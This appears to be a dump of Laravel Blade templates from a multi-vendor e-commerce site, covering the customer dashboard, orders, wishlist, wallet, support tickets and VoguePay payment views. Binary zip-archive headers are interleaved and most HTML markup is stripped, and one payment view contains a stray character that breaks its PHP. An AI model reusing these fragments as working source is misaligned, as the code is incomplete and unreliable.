    {{ translate('Between you and') }} @if ($conversation->sender_id == Auth::user()->id) {{ $conversation->receiver->shop ? $conversation->receiver->shop->name : $conversation->receiver->name }} @else {{ $conversation->sender->name }} @endif

    @include('frontend.partials.messages', ['conversation', $conversation])
    @csrf
    @endsection @section('script') @endsection PK�N]D��k�k�0views/frontend/user/customer/dashboard.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content') @php $welcomeCoupon = ifUserHasWelcomeCouponAndNotUsed(); @endphp @if($welcomeCoupon)
    @php $discount = $welcomeCoupon->discount_type == 'amount' ? single_price($welcomeCoupon->discount) : $welcomeCoupon->discount.'%'; @endphp
    {{ translate('Welcome Coupon') }} {{ $discount }} {{ translate('Discount on your Purchase Within') }} {{ $welcomeCoupon->validation_days }} {{ translate('days of Registration') }}
    @endif
    @if (get_setting('wallet_system') == 1)

    {{ translate('Wallet Balance') }}

    {{ single_price(Auth::user()->balance) }}


    @php $last_recharge = get_user_last_wallet_recharge(); @endphp

    {{ translate('Last Recharge') }} {{ $last_recharge ? date('d.m.Y', strtotime($last_recharge->created_at)) : '' }}

    {{ $last_recharge ? single_price($last_recharge->amount) : 0 }}

    {{ translate('Offline Recharge Wallet') }}
    @endif
    {{ translate('Total Expenditure') }} {{ single_price(get_user_total_expenditure()) }}
    {{ translate('View Order History') }}
    @if (addon_is_activated('club_point'))
    {{ translate('Total Club Points') }} {{ get_user_total_club_point() }}
    {{ translate('Convert Club Points') }}
    @endif
    @php $cart = get_user_cart(); @endphp {{ count($cart) > 0 ? sprintf("%02d", count($cart)) : 0 }} {{ translate('Products in Cart') }}
    {{ count(Auth::user()->wishlists) > 0 ? sprintf("%02d", count(Auth::user()->wishlists)) : 0 }} {{ translate('Products in Wishlist') }}
    @php $total = get_user_total_ordered_products(); @endphp {{ $total > 0 ? sprintf("%02d", $total) : 0 }} {{ translate('Total Products Ordered') }}
    {{ translate('Default Shipping Address') }}
    @if(Auth::user()->addresses != null) @php $address = Auth::user()->addresses->where('set_default', 1)->first(); @endphp @if($address != null)
    • {{ $address->address }},
    • {{ $address->area ? $address->area->name . ',' : '' }}
    • {{ $address->postal_code }} - {{ $address->city->name }},
    • {{ $address->state ? $address->state->name : '' }}
    • {{ $address->country->name }}.
    • {{ $address->phone }}
    @endif @endif
    {{ translate('Default Billing Address') }}
    @if(Auth::user()->addresses != null) @php $address = Auth::user()->addresses->where('set_billing', 1)->first(); @endphp @if($address != null)
    • {{ $address->address }},
    • {{ $address->area ? $address->area->name . ',' : '' }}
    • {{ $address->postal_code }} - {{ $address->city->name }},
    • {{ $address->state ? $address->state->name : '' }}
    • {{ $address->country->name }}.
    • {{ $address->phone }}
    @endif @endif
    @if (get_setting('classified_product'))
    {{ translate('Purchased Package') }}
    @php $customer_package = get_single_customer_package(Auth::user()->customer_package_id); @endphp @if($customer_package != null)

    {{ translate('Current Package') }}: {{ $customer_package->getTranslation('name') }}

    {{ translate('Product Upload') }} {{ $customer_package->product_upload }} {{ translate('Times')}}

    {{ translate('Product Upload Remains') }} {{ Auth::user()->remaining_uploads }} {{ translate('Times')}}

    @else {{translate('Package Not Found')}} @endif {{ translate('Upgrade Package') }}
    @endif

    {{ translate('My Wishlist')}}

    @php $wishlists = get_user_wishlist(); @endphp @if (count($wishlists) > 0)
    @foreach($wishlists->take(5) as $key => $wishlist) @if ($wishlist->product != null)
    {{ $wishlist->product->getTranslation('name') }} @php $colors = is_string($wishlist->product->colors) ? json_decode($wishlist->product->colors, true) : $wishlist->product->colors; $attributes = is_string($wishlist->product->attributes) ? json_decode($wishlist->product->attributes, true) : $wishlist->product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif
    {{ $wishlist->product->getTranslation('name') }}
    {{ home_discounted_base_price($wishlist->product) }} @if(home_base_price($wishlist->product) != home_discounted_base_price($wishlist->product)) {{ home_base_price($wishlist->product) }} @endif
    @endif @endforeach
    @else
    Image
    {{ translate("There isn't anything added yet")}}
    @endif @endsection @section('modal') @include('frontend.partials.wallet_modal') @include('frontend.partials.address.address_modal') @endsection @section('script') @include('frontend.partials.address.address_js') @if(get_active_countries()->count() == 1) @endif @if (get_setting('google_map') == 1) @include('frontend.partials.google_map') @endif @if(addon_is_activated('portfolio_system') && auth()->user()->verification_status == 0 && get_setting('customer_verification') == 1) @endif @endsection PK�N]��|,uu7views/frontend/user/customer/followed_sellers.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Followed Sellers') }}

    @if (count($followed_sellers) > 0)
    @foreach ($followed_sellers as $key => $followed_seller) @if($followed_seller->shop !=null)
    {{ $followed_seller->shop->name }}

    {{ $followed_seller->shop->name }}

    {{ renderStarRating($followed_seller->shop->rating) }} ({{ $followed_seller->shop->num_of_reviews }} {{ translate('reviews') }})
    {{ translate('Visit Store') }}
    @endif @endforeach
    @else
    Image
    {{ translate("There isn't anything added yet")}}
    @endif
    {{ $followed_sellers->links() }}
    @endsection PK�N]yc�(�'�'9views/frontend/user/customer/notification/index.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{translate('Notifications')}}
      @php $notificationShowDesign = get_setting('notification_show_type'); if($notificationShowDesign != 'only_text'){ $notifyImageDesign = ''; if($notificationShowDesign == 'design_2'){ $notifyImageDesign = 'rounded-1'; } elseif($notificationShowDesign == 'design_3'){ $notifyImageDesign = 'rounded-circle'; } } @endphp @forelse($notifications as $notification) @php $showNotification = true; if (($notification->type == 'App\Notifications\PreorderNotification') && !addon_is_activated('preorder')) { $showNotification = false; } @endphp @if($showNotification)
    • @php $notificationType = get_notification_type($notification->notification_type_id, 'id'); $notifyContent = $notificationType->getTranslation('default_text'); @endphp
      @if($notificationShowDesign != 'only_text')
      @endif

      @if($notification->type == 'App\Notifications\OrderNotification') @php $orderCode = $notification->data['order_code']; $route = route('purchase_history.details', encrypt($notification->data['order_id'])); $orderCode = "".$orderCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); @endphp @elseif($notification->type == 'App\Notifications\OrderTrackingNotification') @php $orderCode = $notification->data['order_code']; $trackingCode = $notification->data['tracking_code']; $route = route('purchase_history.details', encrypt($notification->data['order_id'])); $route2 = route('orders.track', ['tracking_code' => $notification->data['tracking_code']]); $orderCode = "".$orderCode.""; $trackingCode = "".$trackingCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); $notifyContent = str_replace('[[tracking_code]]', $trackingCode, $notifyContent); @endphp @elseif($notification->type == 'App\Notifications\PreorderNotification') @php $orderCode = $notification->data['order_code']; $route = route('preorder.order_details', encrypt($notification->data['preorder_id'])); $orderCode = "".$orderCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); @endphp @elseif($notification->type == 'App\Notifications\CustomNotification') @php $link = $notification->data['link']; if($link != null){ $notifyContent = "".$notifyContent.""; } @endphp @endif {!! $notifyContent !!}

      {{ date("F j Y, g:i a", strtotime($notification->created_at)) }}
    • @endif @empty
    • {{ translate('No notification found') }}
    • @endforelse
    {{ $notifications->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�g7�,,/views/frontend/user/customer/products.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Classified Products') }}

    @php $authUser = auth()->user(); @endphp
    {{ translate('Remaining Uploads') }}
    {{ max(0, $authUser->remaining_uploads) }}
    @php $customer_package = get_single_customer_package($authUser->customer_package_id); @endphp
    @if($customer_package != null) {{ translate('Current Package')}}: {{ $customer_package->getTranslation('name') }} @else
    {{ translate('No Package Found')}}
    @endif {{ translate('Upgrade Package')}}
    {{ translate('All Products') }}
    @foreach ($products as $key => $product) @endforeach
    # {{ translate('Product')}} {{ translate('Price')}} {{ translate('Available Status')}} {{ translate('Admin Status')}} {{ translate('Options')}}
    {{ sprintf('%02d', $key+1) }} {{  $product->getTranslation('name')  }} {{ $product->name }} {{ single_price($product->unit_price) }} @if ($product->published == '1') {{ translate('PUBLISHED')}} @else {{ translate('PENDING')}} @endif
    {{ $products->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]��ܯ�=�=3views/frontend/user/customer/product_edit.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Add Your Product') }}

    @csrf
    {{translate('General')}}
    {{translate('Images')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Videos')}}
    {{translate('Meta Tags')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Price')}}
    {{translate('Description')}}
    {{translate('PDF Specification')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endsection @section('script') @endsection PK�N]Kq��5�55views/frontend/user/customer/product_upload.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Add Your Product') }}

    @csrf
    {{translate('General')}}
    {{translate('Images')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Videos')}}
    {{translate('Meta Tags')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Price')}}
    {{translate('Description')}} *
    {{translate('PDF Specification')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endsection @section('script') @endsection PK�N]l�R��>views/frontend/user/customer/wallet_recharge_success.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate("Wallet Recharge Successful") }}

    {{ translate("Your Wallet Recharge Request is Successful") }}

    @endsection PK�N]8views/frontend/user/customer/wallet_recharge_success.phpnu�[���PK�N]F�K�(�(5views/frontend/user/customer_packages_lists.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('Premium Packages for Customers') }}

    @foreach ($customer_packages as $key => $customer_package)
    {{ $customer_package->getTranslation('name') }}
    • {{ $customer_package->product_upload }} {{ translate('Product Upload') }}
    @if ($customer_package->amount == 0) {{ translate('Free') }} @else {{ single_price($customer_package->amount) }} @endif
    @if ($customer_package->amount == 0) @else @if (addon_is_activated('offline_payment')) @else @endif @endif
    @endforeach
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]�V�� � 6views/frontend/user/digital_purchase_history.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Download Your Products') }}
    @foreach ($orders as $key => $order_id) @php $order = get_order_details($order_id->id); @endphp @endforeach
    {{ translate('Product')}} {{ translate('Option')}}
    {{  $order->product->getTranslation('name')  }} {{ $order->product->getTranslation('name') }}
    {{ $orders->links() }}
    @endsection PK�N]=�K�o�o�4views/frontend/user/order_details_customer.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Order id') }}: {{ $order->code }}

    @php $first_order = $order->orderDetails->first(); $gstin = get_seller_gstin($order); @endphp
    {{ translate('Order Summary') }}
    @if ($order->user_id != null) @endif @if ( json_decode($order->billing_address) != null) @endif @if ($gstin != null && is_numeric($first_order->gst_amount)) @endif
    {{ translate('Order Code') }}: {{ $order->code }}
    {{ translate('Customer') }}: {{ json_decode($order->shipping_address)->name }}
    {{ translate('Email') }}:{{ $order->user->email }}
    {{ translate('Shipping address') }}: {{ json_decode($order->shipping_address)->address }}, {{ json_decode($order->shipping_address)->city }}, @if(isset(json_decode($order->shipping_address)->state)) {{ json_decode($order->shipping_address)->state }} - @endif {{ json_decode($order->shipping_address)->postal_code }}, {{ json_decode($order->shipping_address)->country }}
    {{ translate('Billing address') }}: {{ json_decode($order->billing_address)->address }}, {{ json_decode($order->billing_address)->city }}, @if(isset(json_decode($order->billing_address)->state)) {{ json_decode($order->billing_address)->state }} - @endif {{ json_decode($order->billing_address)->postal_code }}, {{ json_decode($order->billing_address)->country }}
    {{ translate('GSTIN') }}: {{$gstin}}
    {{ translate('Seller Address') }}: {{ get_seller_address($order) }}
    @if ($order->tracking_code) @endif
    {{ translate('Order date') }}: {{ date('d-m-Y H:i A', $order->date) }}
    {{ translate('Order status') }}: {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }}
    {{ translate('Total order amount') }}: {{ single_price($order->grand_total) }}
    {{ translate('Shipping method') }}: {{ translate('Flat shipping rate') }}
    {{ translate('Payment method') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->payment_type))) }}
    {{ translate('Additional Info') }} {{ $order->additional_info }}
    {{ translate('Tracking code') }}: {{ $order->tracking_code }}
    {{ translate('Order Details') }}
    @if (addon_is_activated('refund_request')) @endif @foreach ($order->orderDetails as $key => $orderDetail) @if (addon_is_activated('refund_request')) @php $no_of_max_day = $orderDetail->refund_days; $last_refund_date = null; if ($order->delivered_date && $no_of_max_day > 0) { $last_refund_date = Carbon\Carbon::parse($order->delivered_date)->addDays($no_of_max_day); } $today_date = Carbon\Carbon::now(); @endphp @endif @endforeach
    # {{ translate('Product') }} {{ translate('Variation') }} {{ translate('Quantity') }} {{ translate('Delivery Type') }} {{ translate('Price') }}{{ translate('Refund Status') }}{{ translate('Review') }}
    {{ sprintf('%02d', $key+1) }} @if ($orderDetail->product != null && $orderDetail->product->auction_product == 0) {{ $orderDetail->product->getTranslation('name') }} @elseif($orderDetail->product != null && $orderDetail->product->auction_product == 1) {{ $orderDetail->product->getTranslation('name') }} @else {{ translate('Product Unavailable') }} @endif {{ $orderDetail->variation }} {{ $orderDetail->quantity }} @if ($order->shipping_type != null && $order->shipping_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->shipping_type == 'pickup_point') @if ($order->pickup_point != null) {{ $order->pickup_point->name }} ({{ translate('Pickip Point') }}) @else {{ translate('Pickup Point') }} @endif @elseif($order->shipping_type == 'carrier') @if ($order->carrier != null) {{ $order->carrier->name }} ({{ translate('Carrier') }})
    {{ translate('Transit Time').' - '.$order->carrier->transit_time }} @else {{ translate('Carrier') }} @endif @endif
    {{ single_price($orderDetail->price) }} @if ( $orderDetail->product != null && $orderDetail->refund_request == null && $last_refund_date && $today_date <= $last_refund_date && $order->payment_status == 'paid' && $order->delivery_status == 'delivered' ) {{ translate('Send') }} @elseif ($orderDetail->refund_request != null && $orderDetail->refund_request->refund_status == 0) {{ translate('Pending') }} @elseif ($orderDetail->refund_request != null && $orderDetail->refund_request->refund_status == 2) @if($orderDetail->refund_request->dispute_refund_status == 1) {{ translate('Dispute Pending') }} @elseif($orderDetail->refund_request->dispute_refund_status == 2) {{ translate('Dispute Approved') }} @elseif($orderDetail->refund_request->dispute_refund_status == 3) {{ translate('Dispute Rejected') }} @else {{ translate('Rejected') }} @endif @elseif ($orderDetail->refund_request != null && $orderDetail->refund_request->refund_status == 1) {{ translate('Approved') }} @elseif ($orderDetail->product != null && $orderDetail->refund_days != 0) {{ translate('N/A') }} @else {{ translate('Non-refundable') }} @endif @if ($orderDetail->delivery_status == 'delivered') @php $hasReview = \App\Models\Review::where('product_id', $orderDetail->product_id) ->where('user_id', auth()->id()) ->exists(); @endphp @if ($hasReview) {{ translate('Reviewed') }} @else {{ translate('Review') }} @endif @else {{ translate('Not Delivered Yet') }} @endif
    {{ translate('Order Ammount') }}
    @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @else @endif
    {{ translate('Subtotal') }} {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Shipping') }} {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('CGST') }} {{ single_price($order->orderDetails->sum('gst_amount')/2) }}
    {{ translate('SGST') }} {{ single_price($order->orderDetails->sum('gst_amount')/2) }}
    {{ translate('IGST') }} {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Tax') }} {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Coupon') }} {{ single_price($order->coupon_discount) }}
    {{ translate('Total') }} {{ single_price($order->grand_total) }}
    @if ($order->payment_status == 'unpaid' && $order->delivery_status == 'pending' && $order->manual_payment == 0) @endif
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]?�5��2views/frontend/user/product_review_modal.blade.phpnu�[���
    {{ translate('Review') }}
    @if($review == null)

    {{ $product->getTranslation('name') }}

    ({{ translate('Max 6 files')}})
    @error('photos') {{ $message }} @enderror @error('photos.*') {{ $message }} @enderror {{translate('These images are visible in product review page gallery')}}
    @else
  • {{ $product->getTranslation('name') }}

    @for ($i = 0; $i < $review->rating; $i++) @endfor @for ($i = 0; $i < 5 - $review->rating; $i++) @endfor

    {{ $review->comment }}

    @if($review->photos != null)
    @foreach (explode(',', $review->photos) as $photo) @endforeach
    @endif
  • @endifPK�N]�}2:�:�%views/frontend/user/profile.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Manage Profile') }}

    {{ translate('Basic Info')}}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @if (addon_is_activated('otp_system'))
    {{ translate('OTP Activation')}}
    @csrf
    @endif
    {{ translate('Address')}}
    @foreach (Auth::user()->addresses as $key => $address)
    {{ translate('Address') }}: {{ $address->address }}
    {{ translate('Postal Code') }}: {{ $address->postal_code }}
    @if ($address->area)
    {{ translate('Area') }} {{ optional($address->area)->name }}
    @endif
    {{ translate('City') }}: {{ optional($address->city)->name }}
    @if (get_setting('has_state') == 1)
    {{ translate('State') }}: {{ optional($address->state)->name }}
    @endif
    {{ translate('Country') }}: {{ optional($address->country)->name }}
    {{ translate('Phone') }}: {{ $address->phone }}
    @if ($address->set_default) {{ translate('Default Shipping') }} @endif @if ($address->set_billing) {{ translate('Default Billing') }} @endif
    @endforeach
    {{ translate('Add New Address') }}
    @if (addon_is_activated('offline_payment') && addon_is_activated(identifier: 'refund_request'))
    {{ translate('Payment Information')}}
    @foreach (Auth::user()->payment_informations as $key => $payment_information)
    @if ($payment_information->payment_type == 'others')
    {{ translate('Name') }}: {{ optional($payment_information->other_payout_method)->name ?? $payment_information->payment_name }}
    {{ translate('Instructions') }}: {{ $payment_information->payment_instruction }}
    @else
    {{ translate('Bank Name') }}: {{ optional($payment_information->payout_method)->name ?? $payment_information->bank_name }}
    {{ translate('Account Name') }}: {{ $payment_information->account_name }}
    {{ translate('Account Number') }} {{ $payment_information->account_number }}
    {{ translate('Routing Number') }}: {{ $payment_information->routing_number }}
    @endif
    @if ($payment_information->set_default) {{ translate('Default') }} @endif
    @endforeach @php $payment_count = Auth::user()->payment_informations->count(); @endphp @if($payment_count < 2)
    {{ translate('Add New Payment Information') }}
    @endif
    @endif
    @csrf
    {{ translate('Change your email')}}
    @endsection @section('modal') @include('frontend.partials.address.address_modal') @endsection @section('script') @include('frontend.partials.address.address_js') @if (get_setting('google_map') == 1) @include('frontend.partials.google_map') @endif @endsectionPK�N]��&�_-_-.views/frontend/user/purchase_history.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Purchase History') }}
    @endsection @section('modal') @endsection @section('script') @endsectionPK�N]���  8views/frontend/user/purchase_history_to_review.blade.phpnu�[���@php $filteredOrders = $orders->filter(function($order) use ($reviewedProducts){ return $order->orderDetails->filter(function($detail) use ($reviewedProducts){ return $detail->delivery_status == 'delivered' && !in_array($detail->product_id, $reviewedProducts); })->count() > 0; }); @endphp @if($filteredOrders->count() > 0) @foreach($filteredOrders as $order)
    @foreach($order->orderDetails as $orderDetail) @if($orderDetail->delivery_status == 'delivered' && !in_array($orderDetail->product_id, $reviewedProducts))
    {{ $orderDetail->product->getTranslation('name') }}
    {{ $orderDetail->variation }}
    {{ single_price($orderDetail->price) }}
    Qty {{ $orderDetail->quantity }}

    @endif @endforeach
    @endforeach @else
    {{ translate('No items to review') }}
    @endifPK�N]�Dv��*�*5views/frontend/user/single_purchase_history.blade.phpnu�[���@forelse($orders as $order)

    {{ translate('Order ID') }} - {{ $order->code }} {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }} @if ($order->payment_status == 'paid') {{ translate('Paid') }} @else {{ translate('Unpaid') }} @endif

    {{ translate('Date') }}: {{ date('d-m-Y', $order->date) }}
    {{ translate('Reorder') }}
    {{ get_shop_by_user_id($order->seller_id)->name ?? 'Inhouse Products' }}
    {{ translate('Date') }}: {{ date('d-m-Y', $order->date) }}
    {{ translate('Reorder') }}

    @foreach ($order->orderDetails as $orderDetail) @if (!$loop->first)
    @endif
    @if ($orderDetail->product)
    {{ $orderDetail->product->getTranslation('name') }}
    {{ $orderDetail->variation }}
    @else
    {{ translate('Product deleted') }}
    {{ $orderDetail->variation }}
    @endif
    {{ single_price($orderDetail->price) }}
    {{ translate('Qty') }} {{ $orderDetail->quantity }}
    @if ($orderDetail->delivery_status == 'delivered') @php $hasReview = \App\Models\Review::where('product_id', $orderDetail->product_id) ->where('user_id', auth()->id()) ->exists(); @endphp @if ($hasReview) {{ translate('Reviewed') }} @else {{ translate('Review') }} @endif @else {{ translate('Not Delivered') }} @endif
    @endforeach

    @empty
    {{ translate('No orders found') }}
    @endforelse @if ($orders->count() > 0) @endif PK�N],�RE��2views/frontend/user/support_ticket/index.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('Support Ticket') }}

    {{ translate('Create a Ticket') }}
    {{ translate('Tickets')}}
    @foreach ($tickets as $key => $ticket) @endforeach
    {{ translate('Ticket ID') }} {{ translate('Sending Date') }} {{ translate('Subject')}} {{ translate('Status')}} {{ translate('Options')}}
    #{{ $ticket->code }} {{ date('Y.m.d h:i:m', strtotime($ticket->created_at)) }} {{ $ticket->subject }} @if ($ticket->status == 'pending') {{ translate('Pending')}} @elseif ($ticket->status == 'open') {{ translate('Open')}} @else {{ translate('Solved')}} @endif {{ translate('View Details')}}
    {{ $tickets->links() }}
    @endsection @section('modal') @endsection PK�N]�X'ZZ1views/frontend/user/support_ticket/show.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ $ticket->subject }} #{{ $ticket->code }}
    {{ $ticket->user->name }} {{ $ticket->created_at }} {{ translate(ucfirst($ticket->status)) }}

    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endsection PK�N]�#��EE+views/frontend/user/view_wishlist.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Wishlist')}}
    @if (count($wishlists) > 0)
    @foreach($wishlists as $key => $wishlist)
    {{ $wishlist->product->getTranslation('name') }} @php $colors = is_string($wishlist->product->colors) ? json_decode($wishlist->product->colors, true) : $wishlist->product->colors; $attributes = is_string($wishlist->product->attributes) ? json_decode($wishlist->product->attributes, true) : $wishlist->product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif
    {{ $wishlist->product->getTranslation('name') }}
    {{ home_discounted_base_price($wishlist->product) }} @if(home_base_price($wishlist->product) != home_discounted_base_price($wishlist->product)) {{ home_base_price($wishlist->product) }} @endif
    @endforeach
    @else
    Image
    {{ translate("There isn't anything added yet")}}
    @endif
    {{ $wishlists->links() }}
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]�D�:��*views/frontend/user/wallet/index.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')

    {{ translate('My Wallet') }}

    {{ translate('Wallet Balance') }}
    {{ single_price(Auth::user()->balance) }}
    {{ translate('Recharge Wallet') }}
    @if (addon_is_activated('offline_payment'))
    {{ translate('Offline Recharge Wallet') }}
    @endif
    {{ translate('Wallet recharge history') }}
    @foreach ($wallets as $key => $wallet) @endforeach
    # {{ translate('Date') }} {{ translate('Amount') }} {{ translate('Payment Method') }} {{ translate('Status') }}
    {{ sprintf('%02d', ($key+1)) }} {{ date('d-m-Y', strtotime($wallet->created_at)) }} {{ single_price($wallet->amount) }} {{ ucfirst(str_replace('_', ' ', $wallet->payment_method ?? '--')) }} @if ($wallet->offline_payment) @if ($wallet->approval && $wallet->added_by == 'admin') @elseif($wallet->approval) @else {{ translate('Pending') }} @endif @else N/A @endif
    {{ $wallets->links() }}
    @endsection @section('modal') @include('frontend.partials.wallet_modal') @if (addon_is_activated('offline_payment')) @include('manual_payment_methods.frontend.payment_receipt') @endif @endsection @section('script') @endsection PK�N]i΂��;views/frontend/user/wallet/offline_recharge_modal.blade.phpnu�[���
    @csrf
    @foreach(get_all_manual_payment_methods() as $method)
    @php echo $method->description @endphp
    @if ($method->bank_info != null)
      @foreach (json_decode($method->bank_info) as $key => $info)
    • {{ translate('Bank Name') }} - {{ $info->bank_name }}, {{ translate('Account Name') }} - {{ $info->account_name }}, {{ translate('Account Number') }} - {{ $info->account_number}}, {{ translate('Routing Number') }} - {{ $info->routing_number }}
    • @endforeach
    @endif
    @endforeach PK�N]=�S*YY"views/frontend/view_cart.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    @include('frontend.partials.cart.cart_details', ['carts' => $carts])
    @endsection @section('script') @php // Build GA4 view_cart $items = []; $computedTotal = 0.0; foreach ($carts as $cartItem) { $product = get_single_product($cartItem['product_id'] ?? null); if (!$product) { continue; } $categoryname = optional($product->category)->name ?? optional($product->categories->first())->name ?? 'Uncategorized'; $price = (float) ($product->unit_price ?? 0); $discount = (float) ($product->discount ?? 0); $qty = (int) ($cartItem['quantity'] ?? $cartItem['qty'] ?? 1); $items[] = [ 'item_id' => (string) $product->id, 'item_name' => $product->getTranslation('name') ?? $product->name, 'item_category' => $categoryname, 'item_list_name' => 'Related Products', 'price' => $price, 'discount' => $discount, 'quantity' => $qty, ]; $computedTotal += max($price - $discount, 0) * $qty; } $cartValue = isset($total) ? (float) $total : $computedTotal; $ga4ViewCart = [ 'event' => 'view_cart', 'ecommerce' => [ 'currency' => "{{ get_system_currency()->code }}", 'value' => $cartValue, 'items' => $items, ], ]; @endphp @if (get_setting('google_analytics') == 1) @endif @endsection PK�N]�_����%views/frontend/view_compare.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    {{ translate('Compare Products')}}
    {{ translate('Reset Compare List')}}
    @if(Session::has('compare')) @if(count(Session::get('compare')) > 0)
    @foreach (Session::get('compare') as $key => $item) @php $product = get_single_product($item); @endphp
    {{ translate('Image')}}
    {{ translate('Product Image') }}
    {{ translate('Price')}}
    @if(home_base_price($product) != home_discounted_base_price($product)) {{ home_base_price($product) }} @endif {{ home_discounted_base_price($product) }}
    {{ translate('Category')}}
    @if (get_single_product($item)->main_category != null) {{ get_single_product($item)->main_category->getTranslation('name') }} @endif
    {{ translate('Brand')}}
    @if (get_single_product($item)->brand != null) {{ get_single_product($item)->brand->getTranslation('name') }} @endif
    @endforeach
    @endif @else

    {{ translate('Your comparison list is empty')}}

    @endif
    @endsection PK�N]>�c��4views/frontend/voguepay/cart_payment_vogue.blade.phpnu�[��� @if (get_setting('voguepay_sandbox') == 1) @else @endif PK�N]��JPP@views/frontend/voguepay/customer_package_payment_vogue.blade.phpnu�[��� @if (get_setting('voguepay_sandbox') == 1) @else @endif @php $customer_package = get_single_customer_package(Session::get('payment_data')['customer_package_id']); $user = Auth::user(); @endphp PK�N]�Շc��8views/frontend/voguepay/order_re_payment_vogue.blade.phpnu�[��� @if (get_setting('voguepay_sandbox') == 1) @else @endif @php $order = get_order_info(Session::get('payment_data')['order_id']);s $shipping_info = json_decode($order->shipping_address); @endphp PK�N]k�HH>views/frontend/voguepay/seller_package_payment_vogue.blade.phpnu�[��� @if (get_setting('voguepay_sandbox') == 1) @else @endif @php $seller_package = get_single_seller_package(Session::get('payment_data')['seller_package_id']); $user = Auth::user(); @endphp PK�N]�vc��6views/frontend/voguepay/wallet_payment_vogue.blade.phpnu�[��� @if (get_setting('voguepay_sandbox') == 1) @else @endif PK�N]�:� �3�3#views/frontend/nexa/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $lang = get_system_language()->code; @endphp @if (get_setting('enable_flash_deal') == 1 || get_setting('enable_todays_deal') == 1)
    @php $flash_deal = get_featured_flash_deal(); @endphp @if (get_setting('enable_flash_deal') == 1 ) @if ($flash_deal != null)
    @php $flash_deal_products = get_flash_deal_products($flash_deal->id); @endphp
    @endif @endif @php $todays_deal_products = filter_products(App\Models\Product::where('todays_deal', '1'))->orderBy('id', 'desc')->get(); $todays_deal_title_sub_text = get_setting('todays_deal_title_sub_text', null); @endphp @if (get_setting('enable_todays_deal') == 1 && $todays_deal_products != null)
    {{ translate("Today's Deals") }}
    {{ $todays_deal_title_sub_text }}
    @endif
    @endif @php $featured_category_texts = json_decode(get_setting('featured_category_texts'), true) ?? []; $featured_category_title_sub_text = get_setting('featured_categories_title_sub_text', null); @endphp @if (get_setting('enable_featured_categories') == 1) @if (count($featured_categories) > 0)
    {{ translate('Featured Categories') }}

    {{ $featured_category_title_sub_text }}

    {{ translate('View All Categories') }}
    @endif @endif @if (get_setting('enable_banner_1') == 1) @php $homeBanner1Images = get_setting('home_banner1_images', null, $lang); @endphp @if ($homeBanner1Images != null) @php $banner_1_imags = json_decode($homeBanner1Images); $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp @endif @endif @if (get_setting('enable_featured_products') == 1 || get_setting('enable_best_selling_products') == 1)
    @php $featured_products_title_sub_text = get_setting('featured_products_title_sub_text', null); $best_selling_products_title_sub_text = get_setting('best_selling_products_title_sub_text', null); @endphp @if (get_setting('enable_featured_products') == 1 && count(get_featured_products()) > 0) @endif @php $best_selling_products = get_best_selling_products(20); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0 && get_setting('enable_best_selling_products') == 1) @endif
